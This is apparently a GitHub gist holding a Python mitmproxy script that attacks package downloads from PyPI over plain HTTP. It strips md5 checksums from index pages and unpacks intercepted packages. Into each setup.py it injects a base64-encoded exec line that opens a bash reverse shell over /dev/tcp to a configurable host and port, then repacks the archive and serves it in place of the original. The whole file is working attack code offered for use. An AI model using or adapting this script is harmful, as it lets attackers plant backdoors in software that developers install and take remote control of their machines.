# -*- coding: utf-8 -*- | |
# | |
import tempfile | |
import sys, os | |
import re | |
LHOST, LPORT = ('127.0.0.1', '4444') | |
PAYLOAD = (r'''os.system('echo "bash -c \'0<&76-;exec 76<>/dev/tcp/%s/%s; | |
sh <&76 >&76 2>&76\'" | at now 2>/dev/null')''' % (LHOST, LPORT)) | |
PAYLOAD = PAYLOAD.replace('\n', '') | |
def response(context, flow): | |
if not 'Content-Type' in flow.response.headers: | |
return None | |
if flow.request.get_url().startswith('http://pypi.python.org/simple/'): | |
flow.response.content = re.sub(r'#md5=[a-f0-9]+', '', flow.response.content) | |
if flow.response.headers['Content-Type'][0] == 'application/octet-stream'\ | |
and flow.request.host == 'pypi.python.org': | |
tmp_dir = tempfile.mkdtemp() | |
os.chdir(tmp_dir) | |
filename = flow.request.get_path_components()[-1] | |
open(filename, 'wb').write(flow.response.content) | |
os.mkdir('extracted') | |
os.system('aunpack -X '+tmp_dir+'/extracted '+filename) | |
os.system(r'''find . -iname setup.py | xargs sed -i '/setup(/ i\exec ("%''' | |
'''s".decode("base64"))' ''' % | |
PAYLOAD.encode('base64').replace('\n', '')) | |
os.chdir('extracted') | |
os.system('apack -f ../%s *' % filename) | |
flow.response.content = open('../%s' % filename, 'rb').read() |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment